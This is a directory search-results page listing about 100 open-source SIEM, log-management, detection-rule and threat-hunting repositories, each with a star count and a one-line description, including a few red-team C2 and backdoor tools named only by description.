Awesome Open Source
Search
Programming Languages
Languages
All Categories
Categories
About
Search results for siem
siem
x
170 search results found
Wazuh
⭐
8,176
Wazuh - The Open Source Security Platform. Unified XDR and SIEM protection for endpoints and cloud workloads.
Sigma
⭐
7,706
Main Sigma Rule Repository
Graylog2 Server
⭐
6,945
Free and open log management
Redelk
⭐
2,299
Red Team's SIEM - tool for Red Teams used for tracking and alarming about Blue Team activities as well as better usability in long term operations.
Mozdef
⭐
2,172
DEPRECATED - MozDef: Mozilla Enterprise Defense Platform
Elastdocker
⭐
1,596
🐳 Elastic Stack (ELK) v8+ on Docker with Compose. Pre-configured out of the box to enable Logging, Metrics, APM, Alerting, ML, and SIEM features. Up with a Single Command.
Matano
⭐
1,259
Open source security data lake for threat hunting, detection & response, and cybersecurity analytics at petabyte scale on AWS
Digital Forensics Guide
⭐
1,232
Digital Forensics Guide. Learn all about Digital Forensics, Computer Forensics, Mobile device Forensics, Network Forensics, and Database Forensics.
Sentinel Attack
⭐
1,038
Tools to rapidly deploy a threat hunting capability on Azure Sentinel that leverages Sysmon and MITRE ATT&CK
Pfelk
⭐
933
pfSense/OPNsense + Elastic Stack
Awesome Soc
⭐
906
A collection of sources of documentation, as well as field best practices, to build/run a SOC
Security Apis
⭐
835
A collective list of public APIs for use in security. Contributions welcome
Open Source Security Guide
⭐
795
Open Source Security Guide. Learn all about Security Standards (FIPS, CIS, FedRAMP, FISMA, etc.), Frameworks, Threat Models, Encryption, and Benchmarks.
Awesome Cybersecurity Blueteam Cn
⭐
659
网络安全 · 攻防对抗 · 蓝队清单,中文版
Blueteam_homelabs
⭐
654
Great List of Resources to Build an Enterprise Grade Home Lab
Ninja
⭐
614
Open source C2 server created for stealth red team operations
Tenzir
⭐
612
Open source security data pipelines.
Event Forwarding Guidance
⭐
563
Configuration guidance for implementing collection of security relevant Windows Event Log events by using Windows Event Forwarding. #nsacyber
Siem
⭐
489
SIEM Tactics, Techiques, and Procedures
Purplecloud
⭐
461
A little tool to play with Azure Identity - Azure Active Directory lab creation tool
Dsiem
⭐
416
Security event correlation engine for ELK stack
Meerkat
⭐
407
A collection of PowerShell modules designed for artifact gathering and reconnaisance of Windows-based endpoints.
Psrecon
⭐
392
🚀 PSRecon gathers data from a remote Windows host using PowerShell (v2 or later), organizes the data into folders, hashes all extracted data, hashes PowerShell and various system properties, and sends the data off to the security team. The data can be pushed to a share, sent over email, or retained locally.
Evtx To Mitre Attack
⭐
370
Set of EVTX samples (>270) mapped to MITRE Att@k tactic and techniques to measure your SIEM coverage or developed new use cases.
Awesome_threat Hunting
⭐
311
A curated list of the most important and useful resources about Threat Detection,Hunting and Intelligence.
Ace
⭐
288
Automated, Collection, and Enrichment Platform
Attackdatamap
⭐
279
A datasource assessment on an event level to show potential coverage or the MITRE ATT&CK framework
Cyber Sec Resources
⭐
277
An organized list of resources including tools, blog-posts and how-to tutorials compiled and created by SCSP community members.
Openuba
⭐
264
A robust, and flexible open source User & Entity Behavior Analytics (UEBA) framework used for Security Analytics. Developed with luv by Data Scientists & Security Analysts from the Cyber Security Industry. [PRE-ALPHA]
Threathunting Keywords
⭐
252
Awesome list of keywords for Threat Hunting sessions
Malwless
⭐
244
Test Blue Team detections without running any attack.
Xcyclopedia
⭐
216
Encyclopedia for Executables
Microsoft Sentinel Secops
⭐
211
Microsoft Sentinel SOC Operations
Snitchdns
⭐
205
Database Driven DNS Server with a Web UI
Ee Outliers
⭐
204
Open-source framework to detect outliers in Elasticsearch events
Bantam
⭐
186
A PHP backdoor management and generation tool/C2 featuring end to end encrypted payload streaming designed to bypass WAF, IDS, SIEM systems.
Snowalert
⭐
179
Security Analytics Using The Snowflake Data Warehouse
Siembol
⭐
176
An open-source, real-time Security Information & Event Management tool based on big data technologies, providing a scalable, advanced security analytics framework.
Opensiem Logstash Parsing
⭐
170
SIEM Logstash parsing for more than hundred technologies
Clx
⭐
162
A collection of RAPIDS examples for security analysts, data scientists, and engineers to quickly get started applying RAPIDS and GPU acceleration to real-world cybersecurity use cases.
Gene
⭐
149
Signature engine for all your logs
Pie
⭐
147
📫 The Phishing Intelligence Engine - An Active Defense PowerShell Framework for Phishing Defense with Office 365
Logesp
⭐
137
Open Source SIEM (Security Information and Event Management system).
Sigmaui
⭐
127
SIGMA UI is a free open-source application based on the Elastic stack and Sigma Converter (sigmac)
Blue Teaming With Kql
⭐
125
Repository with Sample KQL Query examples for Threat Hunting
Artlas
⭐
119
Apache Real Time Logs Analyzer System
Ypsilon
⭐
116
Automated Use Case Testing
Siegma
⭐
116
SIEGMA - Transform Sigma rules into SIEM consumables
Sophos Central Siem Integration
⭐
107
Simple integration script for 3rd party systems such as SIEMs. Offers command line, file or syslog output in CEF, JSON or key-value pair formats.
Purpleteam
⭐
106
Purpleteam scripts simulation & Detection - trigger events for SOC detections
Rthvm
⭐
101
Resolvn Threat Hunting Virtual Machine
Siac
⭐
87
SIAC is an enterprise SIEM built on open-source technology.
Roota
⭐
86
RootA is a public-domain language of threat detection and response that combines native queries from a SIEM, EDR, XDR, or Data Lake with standardized metadata and threat intelligence to enable automated translation into other languages
Awesome Cybersecurity
⭐
81
Curated list of awesome cybersecurity companies and solutions.
Uncoder_io
⭐
81
An IDE and translation engine for detection engineers and threat hunters. Be faster, write smarter, keep 100% privacy.
Go Sigma Rule Engine
⭐
80
Golang library that implements a sigma log rule parser and match engine.
Controlcompass.github.io
⭐
76
Pointing cybersecurity teams to thousands of detection rules and offensive security tests aligned with common attacker techniques
Project Sauron
⭐
73
Tools to create a Native Windows Audit Collection Platform. Active Directory example provided
Zercurity
⭐
71
Manage, monitor and improve your cyber security posture.
Cloud Security List
⭐
70
A list of cloud security tools and vendors.
Sigmai
⭐
64
Import specific data sources into the Sigma generic and open signature format.
Talr
⭐
62
Threat Alert Logic Repository
Kong Api Manager
⭐
61
Kong API Manager with Prometheus And Graylog
Qradar
⭐
57
Unofficial third-party scripts, playbooks, and content for IBM QRadar & QRadar Community Edition.
Skaetl
⭐
55
Open Source ETL designed for and dedicated to Log processing and transformation
Reversinglabs Siem Rules
⭐
53
A collection of various SIEM rules relating to malware family groups.
Logmira
⭐
45
Logmira by Blumira has been created by Amanda Berlin as a helpful download of Microsoft Windows Domain Group Policy Object settings.
Logrhythm.tools
⭐
44
LogRhythm PowerShell Toolkit
Redteamsiem
⭐
42
Repository of resources for configuring a Red Team SIEM using Elastic
Siem
⭐
40
The repository contains artifacts to create and publish reports, alerts, and dashboards based on Azure AD B2C logs. These artifacts can also be used for Security Information & Event Management (SIEM) related tasks.
Logcampaign
⭐
39
Provides detection capabilities and log conversion to evtx or syslog capabilities
Documentation
⭐
38
SEKOIA.IO Documentation - The Intelligence-Driven SaaS SIEM
Awesomekql
⭐
38
Microsoft Sentinel, Defender for Endpoint - KQL Detection Packs
Detection Rules
⭐
36
Threat Detection & Anomaly Detection rules for popular open-source components
Ossim
⭐
35
Open Source Security Information and event Management
Utmstack
⭐
34
Customizable SIEM and XDR powered by Real-Time correlation and Threat Intelligence
Arcreactor
⭐
32
open-source intelligence gathering for SIEMs <3
Threathunting Keywords Sigma Rules
⭐
32
Sigma detection rules for hunting with the threathunting-keywords project
Gdpatrol
⭐
31
A Lambda-powered Security Orchestration framework for AWS GuardDuty
Threat Detection And Visualization
⭐
30
Threat Detection and Visualization
Littlesnitch Log Exporter
⭐
28
LittleSnitch Log Statistics Exporter
Cbc Syslog
⭐
28
Syslog Connector for the Carbon Black Cloud
Logstash Parsers
⭐
28
Sysmonconfigpusher
⭐
26
Pushes Sysmon Configs
Siem From Scratch
⭐
25
SIEM-From-Scratch is a drop-in ELK based SIEM component for your Vagrant infosec lab
Tigma
⭐
24
Sigma Engine implementation in TypeScript
Uls
⭐
24
Unified Log Streamer (ULS)
Msticnb
⭐
24
MSTIC Notebook Components
Blackesk
⭐
24
BLACK ESK SIEM is a SIEM platform built with Elasticsearch, Syslog-Ng and Kibana
Swelf
⭐
24
Simple Windows Event Log Forwarder (SWELF). Its easy to use/simply works Log Forwarder and EVTX Parser. Almost in full release here at https://github.com/ceramicskate0/SWELF/releases/la
Ansible Splunk Playbook
⭐
23
Install a full Splunk Enterprise Cluster or Universal forwarder using an ansible playbook
Jube
⭐
23
Jube is an open-source software designed for monitoring transactions and events. It offers a range of powerful features including real-time data wrangling, artificial intelligence, decision making, and case management. Jube's exceptional performance is particularly evident in its application to fraud prevention and abuse detection scenarios.
Auditbeat In Action
⭐
22
Demo for Elastic's Auditbeat and SIEM
Uba
⭐
22
UEBA Solution for Insider Security. This repo is archived. Thanks!
Thehive2sigma
⭐
22
Python script to automatically create sigma rules from The hive observables
Osintrealtimecnd
⭐
22
Proactive Computer Network Defense Strategy - OSINT Real Time Threat Stream - Social/DarkNet - Data Mining
Cli Eaa
⭐
21
CLI for Enterprise Application Access (EAA)
Nector
⭐
21
A SIEM inspired by HECTOR, built on Django.
Wazuh2thehive
⭐
19
Wazuh integration TheHive
U Siem Core
⭐
19
Framework definitions that allow to build a custom SIEM.
1-100 of 170 search results
Next >
Privacy
|
About
|
Terms
|
Follow Us On Twitter
Copyright 2018-2024 Awesome Open Source. All rights reserved.